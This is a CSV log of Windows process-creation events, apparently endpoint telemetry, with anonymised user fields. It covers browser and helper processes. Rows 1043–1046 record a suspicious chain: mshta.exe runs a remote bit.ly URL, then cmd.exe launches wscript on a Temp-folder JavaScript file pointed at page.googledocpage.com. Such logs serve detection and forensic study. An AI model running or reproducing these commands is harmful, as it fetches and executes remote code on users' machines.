Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+1038,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:25.376584400+00:00,8732,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:25.353511900+00:00,2928,cmd.exe,"cmd.exe /d /c ""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe"" chrome-extension://efaidnbmnnnibpcajpcglclefindmkaj/ --parent-window=0 < \\.\pipe\chrome.nativeMessaging.in.3192c70b6ac98f93 > \\.\pipe\chrome.nativeMessaging.out.3192c70b6ac98f93",False,2021-06-25 00:39:22.714421800+00:00,1236,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:31.232795700+00:00,2021-06-25 00:41:46.343732100+00:00,2e79a2b2-9eec-416b-9281-854ffa405089,computerpii_0a470890c60768167990033d701e7bd881398861,181250,False,10.7740.19041.1052,False,11540474045178239,,11540474045178240,2021-06-25 00:39:25.353511900+00:00,2928,2021-06-25 00:39:25.353511900+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,2928,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-25 00:39:25.482293800+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,0.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1039,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:25.644901+00:00,15520,WCChromeNativeMessagingHost.exe,"""WCChromeNativeMessagingHost.exe""  chrome-extension://efaidnbmnnnibpcajpcglclefindmkaj/ --parent-window=0 ",PortableExecutable,2021-05-28 05:59:00+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe,171232,4b700f688d0bf07dc2f7cfc658378a01,f2399c9999ba49e7952598df3f95d3854ee69357cc9073b5e54c63a5f7861862,990df54a9fd6c438d31522aecefc71ea0f04f869,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:25.353511900+00:00,2928,cmd.exe,"cmd.exe /d /c ""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe"" chrome-extension://efaidnbmnnnibpcajpcglclefindmkaj/ --parent-window=0 < \\.\pipe\chrome.nativeMessaging.in.3192c70b6ac98f93 > \\.\pipe\chrome.nativeMessaging.out.3192c70b6ac98f93",False,2021-06-25 00:39:22.714421800+00:00,1236,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:31.247198600+00:00,2021-06-25 00:41:46.343819400+00:00,67168cb8-59fa-4341-a8de-9fd616b436e1,computerpii_0a470890c60768167990033d701e7bd881398861,181252,False,10.7740.19041.1052,False,11540474045178239,,11540474045178242,2021-06-25 00:39:25.353511900+00:00,2928,2021-06-25 00:39:25.353511900+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,2928,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-25 00:39:25.482293800+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,0.0,,,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Adobe Systems Inc.,Adobe Create PDF,21.5.20048.436468,,WCChromeNativeMessagingHost.exe,Adobe Create PDF plug-in listener for Chrome
+1040,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:30.833501400+00:00,20056,msedge.exe,"""msedge.exe"" --type=renderer --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:1",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278240,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:31.912296400+00:00,2021-06-25 00:41:46.344253600+00:00,d71beef9-539a-4536-b6c6-00af15bad087,computerpii_0a470890c60768167990033d701e7bd881398861,181262,False,10.7740.19041.1052,False,11540474045178212,,11540474045178251,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge
+1041,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:30.844556+00:00,20112,msedge.exe,"""msedge.exe"" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6340 /prefetch:8",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278240,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:31.912676900+00:00,2021-06-25 00:41:46.344296600+00:00,9b09e8b6-f956-49d6-ba36-92929413dd9e,computerpii_0a470890c60768167990033d701e7bd881398861,181263,False,10.7740.19041.1052,False,11540474045178212,,11540474045178252,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,1.0,1.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge
+1042,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:30.867923600+00:00,4320,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6396 /prefetch:8",PortableExecutable,2021-06-25 00:37:01.284115+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.59\identity_helper.exe,1080736,b4521adad3d48999783119440df8f778,307456fb34b9c5b7621b70a9da9659dedde6eea45c570afd960e9427a5d6c9df,9885be7d4dfa860f6f598414641ff2af5baf5845,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:31.916092800+00:00,2021-06-25 00:41:46.344339900+00:00,811671ef-303e-41e8-9ee3-6a54d14d85c7,computerpii_0a470890c60768167990033d701e7bd881398861,181264,False,10.7740.19041.1052,False,11540474045178212,,11540474045178253,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,1.0,1.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.59,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+1043,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:33.326074+00:00,17496,cmd.exe,"""cmd.exe"" /c start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_f7583a864cb0132cd077ee8c5fa52169bbfe30f7.js"" page.googledocpage.com/ 1 & start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_f7583a864cb0132cd077ee8c5fa52169bbfe30f7.js"" page.googledocpage.com/ 2",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,0b4340ed812dc82ce636c00fa5c9bef2,dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895,51c97ebe601ef079b16bcd87af827b0be5283d96,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:24.786753100+00:00,4296,mshta.exe,"""mshta.exe"" https://bit.ly/3zGwwx7",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:33.669873+00:00,2021-06-25 00:41:46.345657200+00:00,3416663b-a184-4e5f-a476-211da4176687,computerpii_0a470890c60768167990033d701e7bd881398861,181290,False,10.7740.19041.1052,False,11540474045178236,,11540474045178256,2021-06-25 00:39:24.786753100+00:00,4296,2021-06-25 00:39:24.786753100+00:00,\Device\HarddiskVolume3\Windows\System32\mshta.exe,4296,18560,TerminateProcessStartkey,C:\Windows\System32,14848,1979-10-11 17:42:52+00:00,2019-12-07 09:09:39.756421400+00:00,2021-06-25 00:39:29.355699+00:00,2019-12-07 09:09:39.756421400+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,7.0,2049.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Internet Explorer,11.00.19041.1,MSHTA.EXE,MSHTA.EXE,Microsoft (R) HTML Application host,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+1044,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:33.389038+00:00,15760,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:33.326074+00:00,17496,cmd.exe,"""cmd.exe"" /c start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_f7583a864cb0132cd077ee8c5fa52169bbfe30f7.js"" page.googledocpage.com/ 1 & start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_f7583a864cb0132cd077ee8c5fa52169bbfe30f7.js"" page.googledocpage.com/ 2",False,2021-06-25 00:39:24.786753100+00:00,4296,\Device\HarddiskVolume3\Windows\System32\mshta.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:33.702015800+00:00,2021-06-25 00:41:46.345816+00:00,d73b7715-f322-496b-ab14-f67f01e122fd,computerpii_0a470890c60768167990033d701e7bd881398861,181292,False,10.7740.19041.1052,False,11540474045178256,,11540474045178257,2021-06-25 00:39:33.326074+00:00,17496,2021-06-25 00:39:33.326074+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,17496,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-25 00:39:25.482293800+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1045,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:33.596717600+00:00,13452,wscript.exe,"wscript  ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_f7583a864cb0132cd077ee8c5fa52169bbfe30f7.js"" page.googledocpage.com/ 1 ",PortableExecutable,2019-12-07 09:09:07.254980200+00:00,C:\Windows\System32\wscript.exe,170496,0639b0a6f69b3265c1e42227d650b7d1,ce9f70e104c07d92fc05fbd6000839fd6a87ff010e706396f87dd679244ed97b,545ec11dee642de633eb2c6f6ffc90cce4decf8d,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:33.326074+00:00,17496,cmd.exe,"""cmd.exe"" /c start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_f7583a864cb0132cd077ee8c5fa52169bbfe30f7.js"" page.googledocpage.com/ 1 & start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_f7583a864cb0132cd077ee8c5fa52169bbfe30f7.js"" page.googledocpage.com/ 2",False,2021-06-25 00:39:24.786753100+00:00,4296,\Device\HarddiskVolume3\Windows\System32\mshta.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:33.892620600+00:00,2021-06-25 00:41:46.346080400+00:00,f82c1d1b-b65b-44d1-b002-f9a19e3d22ab,computerpii_0a470890c60768167990033d701e7bd881398861,181298,False,10.7740.19041.1052,False,11540474045178256,,11540474045178258,2021-06-25 00:39:33.326074+00:00,17496,2021-06-25 00:39:33.326074+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,17496,128,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-25 00:39:25.482293800+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft ® Windows Script Host,5.812.10240.16384,wscript.exe,wscript.exe,Microsoft ® Windows Based Script Host
+1046,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:33.606778700+00:00,17888,wscript.exe,"wscript  ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_f7583a864cb0132cd077ee8c5fa52169bbfe30f7.js"" page.googledocpage.com/ 2",PortableExecutable,2019-12-07 09:09:07.254980200+00:00,C:\Windows\System32\wscript.exe,170496,0639b0a6f69b3265c1e42227d650b7d1,ce9f70e104c07d92fc05fbd6000839fd6a87ff010e706396f87dd679244ed97b,545ec11dee642de633eb2c6f6ffc90cce4decf8d,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:33.326074+00:00,17496,cmd.exe,"""cmd.exe"" /c start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_f7583a864cb0132cd077ee8c5fa52169bbfe30f7.js"" page.googledocpage.com/ 1 & start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_f7583a864cb0132cd077ee8c5fa52169bbfe30f7.js"" page.googledocpage.com/ 2",False,2021-06-25 00:39:24.786753100+00:00,4296,\Device\HarddiskVolume3\Windows\System32\mshta.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:33.938329200+00:00,2021-06-25 00:41:46.346123+00:00,8b112ee4-b6db-49e7-bf60-044b489c0fd4,computerpii_0a470890c60768167990033d701e7bd881398861,181299,False,10.7740.19041.1052,False,11540474045178256,,11540474045178259,2021-06-25 00:39:33.326074+00:00,17496,2021-06-25 00:39:33.326074+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,17496,128,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-25 00:39:25.482293800+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft ® Windows Script Host,5.812.10240.16384,wscript.exe,wscript.exe,Microsoft ® Windows Based Script Host
+1047,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:36.894643700+00:00,19056,msedge.exe,"""msedge.exe"" --type=renderer --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6984 /prefetch:1",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files 